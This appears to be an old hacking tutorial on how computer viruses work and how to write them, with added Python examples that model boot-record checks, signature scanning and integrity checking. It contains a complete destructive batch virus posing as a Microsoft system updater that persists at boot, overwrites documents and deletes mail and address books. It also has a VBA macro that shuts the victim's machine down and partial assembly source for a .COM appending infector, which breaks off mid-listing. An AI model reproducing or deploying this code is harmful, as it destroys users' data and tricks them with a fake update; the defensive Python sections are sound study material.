__________________________________________________________________
Virus Working or How do I make my own Virus
by Ankit Fadia ankit@bol.net.in
__________________________________________________________________

How does a Virus Work or How do I make My Own Virus

After I wrote the Journals on Happy99 and Melissa, I got many emails asking me about the working of a virus: how it actually infects a computer and how one can write one. This Journal is aimed at making clear how a virus infects something and how exactly it works. I will also give an introduction to writing your own virus.

Virus: What exactly is a Virus

A virus is basically an executable piece of code designed to do three things: infect other files (or boot sectors), survive by replicating itself, and avoid detection. To avoid detection a virus usually hides inside, or disguises itself as, a legitimate program which the user would not normally suspect. Many viruses also carry a destructive payload, for instance corrupting or deleting data on the hard disk by overwriting the FAT (File Allocation Table), but the payload is not what makes a program a virus; replication is.

Viruses can be classified into mainly the following categories:

Boot Sector Viruses (MBR or Master Boot Record)

Boot sector viruses can be created without much difficulty and infect either the Master Boot Record of the hard disk or the boot sector of a floppy. The boot record program responsible for starting the operating system is replaced by the virus: the virus either moves the original boot program to another part of the disk (and passes control to it after it has installed itself in memory) or simply overwrites it. They infect the computer when it boots from an infected disk, typically a floppy that was left in the drive. Popular boot viruses are Michelangelo and Stoned.

*********************
NewBie Tip: Don't know what a MBR or a Master Boot Record is?

First understand what a boot record is. The boot record is the first sector of a floppy (or of a partition on a hard disk). It holds information about the disk layout (sector size, sectors per cluster, number of reserved sectors and so on) followed by a small program, the boot loader, which loads the OS when the machine boots. The MBR is the first sector of the hard disk itself: it contains boot code plus additional details such as the partition table, which tells that code which partition's boot record to load next. If the MBR is corrupted the OS will not be launched.
*******************

File or Program Viruses

Some programs are viruses in disguise: when executed they load the virus into memory along with the program, perform the predefined steps and infect the system. They infect program files, i.e. files with extensions like .EXE, .COM, .BIN, .DRV and .SYS. Some file viruses just replicate, while others destroy the program being used at the time; either way they start replicating as soon as they are loaded into memory. Because an overwriting file virus destroys the program it infects, after removing the virus or disinfecting the system the programs that were corrupted also have to be repaired or reinstalled. Some popular file viruses are Sunday and Cascade.

Multipartite Viruses

Multipartite viruses are the hybrid variety, best described as a cross between boot viruses and file viruses: they infect not only files but also the boot sector. They are more destructive and more difficult to remove. First they infect program files, and when an infected program is launched they start infecting the boot sector too. The interesting thing about these viruses is that they do not stop once the boot sector is infected: the next time the system is booted they load into memory from the boot sector and start infecting other program files again. Some popular examples are Invader and Flip.
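Returning to the boot record and MBR described in the NewBie Tip above: the following Python is an added example (not part of the original article) that parses the fields a DOS boot record carries in its first bytes, splits an MBR into boot code, partition table and signature, and performs the check a boot-sector integrity monitor performs, comparing the code area of the MBR against a copy recorded earlier. The sectors are constructed in memory; the boot-record header follows the Norton listing at the end of this page, and the "loader" and "virus" bytes are placeholders, not real boot code.

```python
"""Parse a DOS boot record and a master boot record, and check the MBR's code area against a
recorded copy. Added example, not from the original article. All sectors are constructed."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = 0xAA55        # bytes 55h AAh at offset 510, read as a little-endian word
PART_TABLE_OFF = 446           # four 16-byte partition entries, then the signature
BPB_FORMAT = "<3s8sHBH"        # jump, OEM name, bytes/sector, sectors/cluster, reserved sectors


def parse_boot_record(sector: bytes) -> dict:
    """Fields at the start of a floppy/partition boot sector (the BIOS Parameter Block)."""
    jmp, oem, bps, spc, reserved = struct.unpack_from(BPB_FORMAT, sector, 0)
    return {
        "jump_ok": jmp[0] in (0xEB, 0xE9),          # JMP over the BPB to the loader code
        "oem_name": oem.decode("ascii", "replace"),
        "bytes_per_sector": bps,
        "sectors_per_cluster": spc,
        "reserved_sectors": reserved,
        "signature_ok": struct.unpack_from("<H", sector, 510)[0] == BOOT_SIGNATURE,
    }


def parse_mbr(sector: bytes) -> dict:
    """Split the first sector of a hard disk into boot code, partition table and signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one 512-byte sector")
    partitions = []
    for slot in range(4):
        off = PART_TABLE_OFF + 16 * slot
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype:                                    # type 0 means the slot is unused
            partitions.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": struct.unpack_from("<H", sector, 510)[0] == BOOT_SIGNATURE,
        "partitions": partitions,
        "boot_code_sha256": hashlib.sha256(sector[:PART_TABLE_OFF]).hexdigest(),
    }


def mbr_code_changed(recorded: bytes, current: bytes) -> bool:
    """The idea behind 'The Master Boot Record on your computer has been modified': compare the
    code area with a copy taken earlier. The partition table is excluded because repartitioning
    legitimately changes it; a virus that only swaps the code is still caught."""
    return recorded[:PART_TABLE_OFF] != current[:PART_TABLE_OFF]


def build_sample_boot_record() -> bytes:
    """Constructed floppy boot sector: the header from the Norton listing, padded, plus signature."""
    head = struct.pack(BPB_FORMAT, bytes([0xEB, 0x2A, 0x90]), b" Norton ", 512, 1, 1)
    return head.ljust(510, b"\x00") + struct.pack("<H", BOOT_SIGNATURE)


def build_sample_mbr() -> bytes:
    """Constructed MBR: placeholder loader code, one bootable FAT16 partition, valid signature."""
    code = bytes([0xFA, 0x33, 0xC0, 0x8E, 0xD0]).ljust(PART_TABLE_OFF, b"\x00")  # cli; xor ax,ax; mov ss,ax
    entry = struct.pack("<B3xB3xII", 0x80, 0x06, 63, 204_737)
    table = entry + b"\x00" * 48
    return code + table + struct.pack("<H", BOOT_SIGNATURE)


def model_boot_virus(clean_mbr: bytes) -> bytes:
    """What a boot virus does to the sector: swap in its own loader, keep the partition table
    so the disk still boots (the original code would be stashed in another sector)."""
    stub = bytes([0xFA, 0xB8, 0x00, 0x9F, 0x8E, 0xD8]).ljust(PART_TABLE_OFF, b"\x90")  # cli; mov ax,9F00h; mov ds,ax; nops
    return stub + clean_mbr[PART_TABLE_OFF:]


if __name__ == "__main__":
    clean = build_sample_mbr()
    print(parse_boot_record(build_sample_boot_record()))
    print(parse_mbr(clean))
    print("MBR code changed:", mbr_code_changed(clean, model_boot_virus(clean)))
```

Note that the partition table and the 55h AAh signature of the infected sample are untouched and still parse correctly; that is exactly why a signature-only sanity check on the MBR proves nothing, and why the comparison has to be against a recorded copy of the code area.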
Stealth Viruses

These viruses use various methods to hide themselves and avoid detection. Some temporarily remove themselves from memory to hide from virus scanners. Some intercept disk reads so that a request for the sector in which they reside is redirected to another sector, or answered with a saved copy of the original contents. Some, like Whale, conceal the increase in the length of an infected file: while the virus is resident it intercepts directory listings and subtracts from the reported size exactly the number of bytes it added, so the original length is displayed. For example, Whale adds 9216 bytes to an infected file and then subtracts those 9216 bytes from the size returned by the directory read. They are somewhat difficult to detect, but only while they are resident: booting from a clean, write-protected floppy and scanning from there removes the deception.

Polymorphic Viruses

These are the most difficult viruses to detect. They have the ability to mutate, which means they change their own code, and with it their signature, each time they spread or infect. In practice the body of the virus is stored encrypted with a key that changes on every infection, and only a small decryption routine runs first; the mutation engine rewrites that routine as well, so no fixed string of bytes survives from one copy to the next. Antivirus programs which look for specific byte sequences are therefore not able to detect such viruses.

Now what exactly is a viral signature? The signature is the specific fingerprint of a particular virus: a string of bytes taken from the code of the virus. Antivirus software maintains a database of known virus signatures and looks for a match in each file it scans. As we see a new virus almost every day, this database of signatures has to be kept updated, which is why the antivirus vendors provide updates.

Macro Viruses

To understand macro viruses you first need to understand a macro.
All of you have used Microsoft Excel or Word. Office 97 has a feature known as macros, which lets a task the user performs often be recorded once and replayed by just clicking a button: a set of automated instructions that makes work faster for the user. Beneath Office 97 sits a Visual Basic engine; the Office suite exposes it as Visual Basic for Applications (VBA), and it can be used for advanced Visual Basic coding.

A macro virus is therefore a virus written as VBA macro code that creates havoc on the computer it is executed on. These viruses spread quickly, and some have random activation, because the code can be attached to any of VBA's event handlers (document open, document close, file save and so on). Macro viruses are not platform specific: a macro virus can infect both Windows and Mac systems, because it runs inside Office rather than on the operating system. But for a macro virus to infect a system, the document with the embedded macro has to be opened.

Now that I have given you a general introduction to the different types of viruses, let's move on to their working: how exactly they infect systems, and why the stealth and polymorphic kinds are difficult to detect. Let's take the example of what most antivirus software does to catch a virus.

One technique is integrity checking, usually called checksumming. An executable file does not change the way a data file does; unless you upgrade the program its contents stay the same. So the checksummer in the antivirus software records a checksum (and the size) of every executable and, on later scans, compares each file against what it recorded. A checker that only records sizes is defeated by a stealth virus that reports the original size, and even a proper checksum is defeated while the stealth virus is resident, because the virus can hand the checker the original bytes when it reads the file. Checksumming is therefore only reliable when run from a clean boot, and a checker that looks only at sizes cannot detect stealth viruses at all.
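The three detection approaches discussed on this page (signature scanning, checksumming, and the heuristic scanning introduced next), run against constructed samples. This is an added example, not code from the original article: the "viral body" is a placeholder string of DOS-call opcodes, the decryptor stub is a genuine 16-bit x86 encoding but is never executed, the file names are made up, and `mutate` takes its key and decryptor variant as parameters where a real mutation engine would pick them at random. It shows a signature missing the mutated copies while a tiny heuristic (recognise the decryption loop, undo it, then apply the signature) catches them, and a size-only checker missing an overwriting infection that a hash-based checker catches.

```python
"""Signature scanning, integrity checking and a simple heuristic, run against constructed
samples. Added example, not from the original article: the 'viral body' is a placeholder
string of DOS-call opcodes, the decryptor is a real 16-bit x86 encoding but is never executed,
and the file names are made up."""
import hashlib
import re

# Constructed stand-in for a virus body: the INT 21h calls a .COM infector uses
# (find first file, open, write, close) as raw opcode bytes. Not a working program.
VIRAL_BODY = bytes.fromhex("b44ecd21 b43dcd21 b440cd21 b43ecd21")
# A signature is just a fixed byte string lifted from a known sample.
SIGNATURES = {"demo.com.infector": bytes.fromhex("b44ecd21b43dcd21")}

# Decryptor shapes the toy mutation engine picks from; all encode the same loop with a
# different index register:  mov cx,LEN ; mov REG,OFF ; L: xor byte [REG],KEY ; inc REG ; loop L
DECRYPTOR_VARIANTS = [
    (b"\xbe", b"\x80\x34", b"\x46"),   # mov si,imm16 / xor byte [si],imm8 / inc si
    (b"\xbf", b"\x80\x35", b"\x47"),   # di
    (b"\xbb", b"\x80\x37", b"\x43"),   # bx
]


def mutate(body: bytes, key: int, variant: int, body_offset: int = 0x110) -> bytes:
    """Polymorphic copy: decryptor stub + body XORed with `key`. A real engine picks key and
    variant at random on every infection; here they are parameters so results are reproducible."""
    mov_reg, xor_op, inc_reg = DECRYPTOR_VARIANTS[variant]
    stub = (b"\xb9" + len(body).to_bytes(2, "little")
            + mov_reg + body_offset.to_bytes(2, "little")
            + xor_op + bytes([key]) + inc_reg
            + b"\xe2\xfa")                      # loop: back 6 bytes to the xor
    return stub + bytes(b ^ key for b in body)


def signature_scan(data: bytes, sigs=SIGNATURES) -> list:
    """Plain signature scanner: report every known byte string present in the file."""
    return [name for name, sig in sigs.items() if sig in data]


# Heuristic: the shape of a self-decrypting loop (any variant above, any key byte).
DECRYPTOR_RE = re.compile(
    rb"\xb9..[\xbe\xbf\xbb]..\x80[\x34\x35\x37](.)[\x46\x47\x43]\xe2\xfa", re.DOTALL)


def heuristic_scan(data: bytes) -> list:
    """Recognise the decryptor, undo it with the key it carries, then apply the signatures
    to the plaintext. This is the 'typical viral code' idea in a very small form."""
    hits = []
    for m in DECRYPTOR_RE.finditer(data):
        key = m.group(1)[0]
        length = int.from_bytes(data[m.start() + 1:m.start() + 3], "little")
        plain = bytes(b ^ key for b in data[m.end():m.end() + length])
        hits += [h for h in signature_scan(plain) if h not in hits]
    return hits


def make_baseline(files: dict) -> dict:
    """Integrity checker, record phase: size and SHA-256 of every executable."""
    return {n: (len(d), hashlib.sha256(d).hexdigest()) for n, d in files.items()}


def integrity_check(files: dict, base: dict, size_only: bool = False) -> list:
    """Integrity checker, verify phase. `size_only` models a checker that only records lengths."""
    changed = []
    for n, d in files.items():
        size, digest = base[n]
        differs = (len(d) != size) if size_only else (hashlib.sha256(d).hexdigest() != digest)
        if differs:
            changed.append(n)
    return changed


def demo() -> dict:
    """Run the three techniques over one constructed host and four kinds of infected copy."""
    host = bytes.fromhex("b409 ba0001 cd21 c3").ljust(64, b"\x90")   # constructed clean .COM
    base = make_baseline({"clean.com": host})
    appended = host + VIRAL_BODY                                       # plain appending infector
    poly = [host + mutate(VIRAL_BODY, 0x5A, 0), host + mutate(VIRAL_BODY, 0xC3, 2)]
    overwriting = VIRAL_BODY + host[len(VIRAL_BODY):]                  # same size as the host
    return {
        "sig_plain": signature_scan(appended),
        "sig_poly": [signature_scan(p) for p in poly],
        "heur_poly": [heuristic_scan(p) for p in poly],
        "size_only_misses_overwrite": integrity_check({"clean.com": overwriting}, base, size_only=True),
        "hash_catches_overwrite": integrity_check({"clean.com": overwriting}, base),
    }
```

The heuristic here works because the decryptor keeps a recognisable shape; real mutation engines insert junk instructions and reorder the loop precisely to break such patterns, which is why modern scanners emulate the code instead of pattern-matching it. The integrity check, by contrast, catches every modification regardless of how the virus looks, as long as it is run from a clean boot so that no resident stealth virus can interpose itself between the checker and the disk.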
So nowadays antiviruses also use a method known as heuristics. Before I get to what heuristic scanning really is: polymorphic viruses mutate and change their signature, so signature-based antivirus software, which compares the bytes of executable files against the database of signatures known so far, cannot detect them (and cannot detect genuinely new viruses either). Thus polymorphic viruses defeat signature scanners and stealth viruses defeat checksummers. In comes the heuristic scanner, which does not rely on signatures but uses a smarter way: it scans the file for typical viral code and behaviour, for example a routine that searches for *.COM files, opens them for writing and appends to them, or a small decryption loop at the entry point. Such scanners have a downside too: sometimes they give false alarms and declare an uninfected file to be a virus.

How does a Polymorphic Virus Strike?

1. The user copies an infected file to the disk.
2. When the infected file is run, it loads the virus into memory (RAM).
3. The virus looks for a host and starts infecting other files on the disk.
4. The virus makes copies of itself on the disk.
5. The mutation engine in each new copy generates a new encryption key and a new decryption routine, so every copy has a different sequence of bytes. This is what defeats signature scanners (not checksummers: the host file still changes, and an integrity check still notices).

How does a Boot Virus Strike?

1. The user boots, or tries to boot, from an infected floppy (for example one left in the drive), or runs an infected program that carries the boot virus inside it (a "dropper").
2. The infected boot sector is executed by the BIOS before any operating system, or the dropper runs, and the virus is loaded into memory.
3. The virus copies the original boot record program to another sector and stores a pointer to it, so it can pass control there after it has installed itself.
4. The virus then writes a copy of itself into the boot sector of the hard disk (and into every floppy accessed later).
5. The next time the computer boots from that disk the virus loads itself into memory first and starts infecting other disks.

How does a Macro Virus Strike?

1. The user gets an infected Office document by email or by any other medium.
2. The infected document is opened by the user.
3. The macro code waits for the event it is attached to as an event handler (for example the document being opened, closed or saved); when that event occurs the virus is set off and starts infecting other documents, usually by first copying itself into the global template so that every document opened afterwards receives it.

Windows does not include an antivirus program. However, it includes several features that make it difficult for viruses to infect your computer. (This section also gives valuable info on how a virus works and can be used to figure out how to write one.) It does this with the following features:

Blocking Direct Disk Access

To infect the hard disk, some viruses and malicious programs try to bypass the operating system and the system ROM BIOS by using the INT 25h and INT 26h interrupts (absolute disk read and write) to write to the hard disk directly. Whenever Windows detects a program trying to write directly to the hard disk in this way, it stops the program from doing so and displays an error message:

'Windows has disabled direct disk access to protect your long filenames. To override this protection, see the LOCK /? command for more information. The system has been halted. Press CTRL+ALT+DELETE to restart your computer.'

This feature prevents such viruses and malicious programs from writing directly to the hard disk and thus, to a certain extent, helps to prevent infections.

Recognising Master Boot Record (MBR) Modifications

The deadlier viruses, those which infect the boot sector, try to modify or write to the Master Boot Record through the INT 13h chain (the BIOS disk service, which resident programs can hook). Windows maintains a list of programs that are hooked into the INT 13h chain. Each time you boot, Windows checks which programs are using the chain and compares that list with the list it recorded earlier. If it finds new programs that were not on the chain the last time it recorded them, it displays an error message:

'WARNING: Your computer may have a virus. The Master Boot Record on your computer has been modified.
Would you like to see more information?'

If you click Yes, the Performance tab of System Properties is displayed, which helps in troubleshooting. Normally, when a virus has infected your system, this Performance tab shows a report saying that a file named Mbrint13.sys is causing drives to be accessed in MS-DOS Compatibility mode; that is the name Windows uses for the INT 13h hook it found installed by the Master Boot Record.

Identifying Unknown Device Drivers

Windows maintains a list of the real-mode device drivers that it knows can safely be replaced with its own protected-mode drivers. Say you add a new real-mode driver or resident program which hooks the INT 13h or INT 21h chain. Windows checks whether it is on that list; if not, Windows accesses the drives through that driver in MS-DOS Compatibility mode instead of its normal protected mode, and displays the following error message:

'A new MS-DOS resident program named <name> may decrease your system performance. Would you like to see more information about this problem?'

NOTE: Here <name> is the name of the new device driver or resident program.

As a result of this feature Windows is able to flag viruses that install themselves as resident programs or device drivers, and not only those that hook the interrupt chains from the boot sector.

How Do I make my own Virus?

Someone once said: "The average virus writer is above 14 years and below the age of 23, and the writers of some evil viruses suffer from social loneliness." Well, I agree with the age thing but not the social thing. Most virus creators do not create viruses with the intent of creating havoc or destroying computers. Just out of interest they create a virus and send it to their friends, and like most email viruses of today it spreads like anything, and before the creator knows it the feds have started a manhunt for him.

Macro Viruses

Macro viruses are basically VB code written in the Visual Basic Editor that ships with Office 97 or Office 2000.
*************
NewBie Tip: To launch the Visual Basic Editor simply press ALT + F11.
************

So in order to write macro viruses you just need to know VB. I am only touching on some VB here, and this guide will in no way make you a VB geek. I am not writing a manual on macro viruses, as I believe macro viruses are lame; I personally hate VB and think assembly viruses are much better and deadlier. If you really want to be good at VB you should know the entire MSDN library like the back of your hand. Access the ultimate source of VB at http://msdn.microsoft.com

Macro viruses can have random or multiple activation events. Let's take an example to make it clearer:

Private Sub UserForm_Initialize()
    CommandButton1.Accelerator = "C"    ' Set accelerator key to ALT + C
End Sub

Private Sub CommandButton1_Click()
    Dim intShell
    ' Windows 9x: RUNDLL user.exe,ExitWindowsExec shuts Windows down without confirmation
    intShell = Shell("c:\windows\rundll.exe user.exe,ExitWindowsExec")
End Sub

The above snippet is triggered when the user clicks the command button. As soon as the button is clicked the handler runs: a variable named intShell is initialised with the result of Shell, and the victim's computer shuts down without warning. In the line Private Sub CommandButton1_Click(), CommandButton1 is the object and _Click is the event. The event can be changed to something else like DblClick, KeyPress, KeyDown, KeyUp, Exit or Enter, so that the macro is triggered when the user double-clicks, presses a key, releases a key, leaves the control or enters it. (A real macro virus hooks document events such as AutoOpen, Document_Open or Document_Close rather than a button, so that it fires without any user action beyond opening the file.)

So if you really want to write a macro virus, first you need to learn VB. A good place to start is the online MSDN Library, or get yourself a good book. If you already know a bit of BASIC and have done either JavaScript or Java, i.e. you know what event handlers are, then I am sure you can learn VBA just by reading the Help and the articles at MSDN.
I personally do not like VB, and if you have still to start learning VB then you should learn some other language; I do not think learning VB is worth the trouble just to make a virus. If your sole aim is to make a deadly virus and create havoc, do not even consider making a macro virus, i.e. learning VB. You should rather look at learning assembly.

There are various reasons why macro viruses are not as deadly as viruses made in assembly. You may have heard about evil Java applets which, when downloaded, create havoc on your PC, and you have certainly heard about the Melissa virus (read my tutorial on Melissa for source code and more info). Both of them are slow: they give the user time to react and maybe stop the infection, and they are not efficient. Assembly viruses, on the other hand, do not give the victim time even to realise what is happening, and before he knows it, he is infected!!!

MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The Atiman_8 Batch File Virus

DISCLAIMER: This virus was created by Ankit Fadia ankit@bol.net.in and is meant for educational purposes only. It was coded to make people understand the basic concept of the working of a virus. Execute this batch file at your own risk. Any damage caused by this file is not Ankit Fadia's fault.
If you want any information regarding this virus, please feel free to contact me at ankit@bol.net.in, and also visit my site at http://www.crosswinds.net/~hackingtruths

The following is a simple but somewhat deadly (but quite lame) batch file virus that I created. I have named it Atiman_8. I have used no advanced batch or DOS commands in this virus and am sure that almost all of you will have no problem understanding the code. If you still have trouble understanding it, do mail me at ankit@bol.net.in

What the file does, in order: if c:\winupdt.bat already exists it jumps to :CODE, otherwise it runs :SETUP. SETUP copies the batch file to c:\winupdt.bat, appends its own text (%0) to c:\autoexec.bat and c:\windows\dosstart.bat so that it runs on every boot and at every DOS prompt, deletes every .zip in the current directory, overwrites every .txt, .xls and .doc in My Documents with a copy of itself, opens a web page, deletes the Outlook Express mail store (*.dbx) and the address book, copies itself into the StartUp folder, and finally shuts Windows down through RUNDLL user.exe,exitwindowsexec. Two things to note: the Identities GUID and the ankit.wab file name are those of the machine it was written on, so those two deletions only fire there; and the comparison of %0 against "C:\AUTOEXEC.BAT" in :CODE is the only guard against appending itself to autoexec.bat again on every run (there is no such guard for dosstart.bat, which therefore grows each time).

@ECHO OFF
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP

:SETUP
@ECHO OFF
ECHO Welcome To Microsoft Windows System Updater Setup
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Scanning System.....Please Wait
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO DONE.
ECHO.
ECHO Installing Components....Please Wait
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO DONE.
ECHO.
ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.
PAUSE
ECHO Downloading Components...Please Wait
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Setup Will Now restart Your Computer....Please Wait
ECHO Your System is not faster by almost 40%.
ECHO Thank you for using a Microsoft Partner's product.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END

:CODE
CLS
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS

:END
CLS

This was an example of a pretty lame batch file virus. We could similarly create one which edits the registry and creates havoc. This is just a thought; I am not responsible for what you do with it.

Using Assembly to Create Your own Virus!!!!

I recently got many emails asking how to create viruses and which languages one needs to know before creating an excellent dreaded virus. The simple answer to all these questions is: learn assembly. It allows us to make really deadly viruses which do not give the victim time to react and infect his system before he even knows what is happening. The best way to learn assembly is to read "The Art of Assembly". It is an excellent book which assumes very little programming experience; it is easy to understand and quite impressive.
Read the Art of Assembly online and become an ASM wiz at:
The Art of Assembly Language Programming
http://webster.cs.ucr.edu/Page_asm/ArtofAssembly/ArtofAsm.html

Online resource: http://www.programmersheaven.com/zone5/index.htm

You should also get a book solely about the x86 architecture; get it online from http://developer.intel.com/design/litcentr/index.htm

****************
TIP: Assembly not only allows you to make viruses, it comes with an added advantage: the power to crack software. Keep reading my Cracking Series to learn how you can crack programs.
****************

Let's move on to the real stuff. In this section I am assuming that you have at least some experience in assembly. The following piece of text has been written by me with some help from Drako.

The survival of a virus is based on its ability to reproduce. "So how do I make a program reproduce?", you might ask. Simple: by getting it to copy itself into other files. The functional logic of a virus is as follows:

1- Search for a file to infect
2- Open the file to see if it is infected
3- If infected, search for another file
4- Else, infect the file
5- Return control to the host program.

The following is an example of a simple virus. It is a non-resident appending infector for .COM files: it searches the current directory, appends its own 190 bytes to the first .COM file found, and overwrites the first three bytes of that file with a JMP to the appended code, keeping a copy of those three bytes so it can restore them in memory before running the host. Note that it does not implement steps 2 and 3 above, so it re-infects files that are already infected.

;****************************************************************
; START OF THE EXAMPLE:
;****************************************************************
;Warning, this example is a
; - The virus does not test for prior infection
; - it searches only for the first .COM file in the current
;   directory
;
; Careful when executing this file, since the first time it's
; executed it will search for and infect the first file in the
; directory. If we later run the newly infected file, it will find
; the first file in its directory, itself. Thus, it will re-infect
; itself over and over.
;===================CODIGO=======================================
;(The variables in a .COM file are relative to offset 100h).
codigo  segment 'code'
        org 100h                ;Organize all the code starting
                                ; from offset 100h
        assume cs:codigo,ds:codigo,es:codigo ;Define the use of the
                                             ; segments

start   proc far                ;Start the routine
COMIENZO:
        push cs                 ;Store CS
        push cs                 ;Store CS once again.
        pop ds                  ;Bring DS out from stack
        pop es                  ;Bring ES out from stack
        call falso_proc         ;Call proc. so that its
                                ; address is placed in the stack
falso_proc proc near
falso_proc endp
        pop bp                  ;BP<== Proc. address.
        sub bp, 107h            ;BP<== BP - its address in the
                                ; first generation
;This is done to address the variables relative to BP, since each
; infection shifts them by exactly the length of the host file. In
; the first generation the address pushed by CALL is 107h, so after
; "SUB BP, 107h" BP is 0 and "BP+VARIABLE" is the variable's own
; address. In a copy appended to a 100h-byte host the same CALL
; pushes 207h, so BP = 100h, the size of the original file, and
; every variable reference is shifted by the right amount. Without
; BP we would be short by 100h bytes.

;Find the first .COM file in the directory
;-----------------------------------------
        mov ah, 4eh             ;Search for the 1st file
        lea dx, [bp+file_inf]   ;DS:DX= offset of FILE_INF ('*.COM';
                                ; a '*.*' mask would match every
                                ; entry, directory names included)
        mov cx, 0000h           ;Entry attributes
        int 21h
;The attributes in CX are the directory entry attributes. With
; CX = 0, DOS searches normal files only. Adding the Hidden, System
; or Directory bits makes DOS return entries with those attributes
; as well as normal files. If the Volume bit is set, the search is
; limited to the volume label.
;These are the bits which correspond to each attribute:
;Bits: 7 6 5 4 3 2 1 0
;      . . . . . . . 1  Bit 0: Read only
;      . . . . . . 1 .  Bit 1: Hidden
;      . . . . . 1 . .  Bit 2: System
;      . . . . 1 . . .  Bit 3: Volume label
;      . . . 1 . . . .  Bit 4: Directory
;      . . 1 . . . . .  Bit 5: Archive
;
;Bits 6 and 7 are not used as they are reserved for "future
; applications".

;Open file
;----------------------------------------------------------------
        mov ah, 3dh             ;Open the file.
        mov al, 00000010b       ;read/write.
        mov dx, 009eh           ;DX<== DTA(filename) offset
        int 21h                 ;put the handle in AX
        push ax                 ;and store in stack.
;The bits in AL are not the directory attributes of before; they
; are the "open" access mode. Only the low 3 bits matter here:
;bits 2 1 0:
;     0 0 0   Read only mode
;     0 0 1   Write only mode
;     0 1 0   Read/Write mode
;
;DS:DX must point at the ASCIIZ string with the name of the file
; to be opened. In this case we have no NAME_OF_FILE variable: the
; name is in the DTA (Disk Transfer Area), because when we search
; for a file to infect, all the information about the file found is
; returned to that memory area. Unless it was moved, the DTA lives
; in the PSP; more precisely, it starts at offset 80h and is 43d
; bytes in size.
;
;The DTA format is as follows:
;
;Offset  Bytes  Function
; 00h    21d    Used by DOS for the 4Fh service
;               (search for the next file)
; 15h    01d    Attributes of the file that's been found
; 16h    02d    File time
; 18h    02d    File date
; 1Ah    04d    File size in bytes
; 1Eh    13d    File name as an ASCIIZ string
;               (FILENAME.EXT),0
;
;So all that remains is to give DX the position in memory of the
; filename. The DTA starts at offset 80h and the name is at
; DTA+1Eh, so DX = 80h + 1Eh = 9Eh, hence "MOV DX, 9Eh"; the
; problem is solved.
;
;Now you are probably asking yourselves what I mean by "handle".
; The handle is a number which tells DOS which file we mean. DOS
; gives us a handle for each file we open, so we have to be careful
; to use the correct handle for each file we read or write.

;Read the first 3 bytes.
;-----------------------------------------------------
        pop bx                  ;I take the handle from the
                                ; stack to BX
        push bx                 ;and I store it again.
        mov ah, 3fh             ;Read file.
        mov cx, 0003h           ;Read 3 bytes.
        lea dx, [bp+buffer]     ;and store in the buffer.
        int 21h

INFECTAR:                       ;(infect)
;Move pointer to the start.
;---------------------------------------------------
        mov ax, 4200h           ;I move the write pointer
                                ; to the beginning of the program
        mov cx, 0000h
        mov dx, 0000h
        int 21h
;The pointer's displacement, relative to the position specified in
; AL, is placed in CX:DX.
; Pointer displacement modes set in AL:
; AL <== 00  Move pointer relative to the beginning of the file.
; AL <== 01  Move pointer relative to its current position.
; AL <== 02  Move pointer relative to end-of-file.

;Write the first byte (jmp)
;-------------------------------------------------
        mov ah, 40h             ;write the first byte.
        mov cx, 1d              ;Quantity=1.
        lea dx, [bp+jump]       ;DX<== JUMP offset
        int 21h
;(Here we still need the handle, but we don't need to set it again
; because the register which contained it, BX, was not modified.)
;
;The first byte to be written is the opcode of a near JMP (0E9h;
; the symbol is in the data area below). What follows it is the
; 16-bit displacement of the jump, which must be file-length - 3,
; because the CPU counts the displacement from the end of the
; 3-byte JMP instruction. Get this arithmetic wrong by even one
; byte and the host crashes instead of running the virus.
;Since the entire virus code is copied at the end of the file, the
; jump gives the virus control in an infected file.

;Calculating file length
;-------------------------------------------------
        mov cx, 2               ;Copy 2 bytes.
        mov si, 009ah           ;SI<== DTA file-size field
                                ; (80h + 1Ah)
        lea di, [bp+longitud]   ;DI<== File LENGTH offset.
        rep movsb               ;Copy.
;This instruction must have the 'SOURCE' buffer address in DS:SI
; and the address where the string will be copied in ES:DI (in this
; case, I copy the file length from the DTA to the variable
; 'LONGITUD').
        sub word ptr [bp+longitud], 3 ;subtract 3 bytes from
                                      ; [LONGITUD]

;The JMP is completed
;--------------------------------------
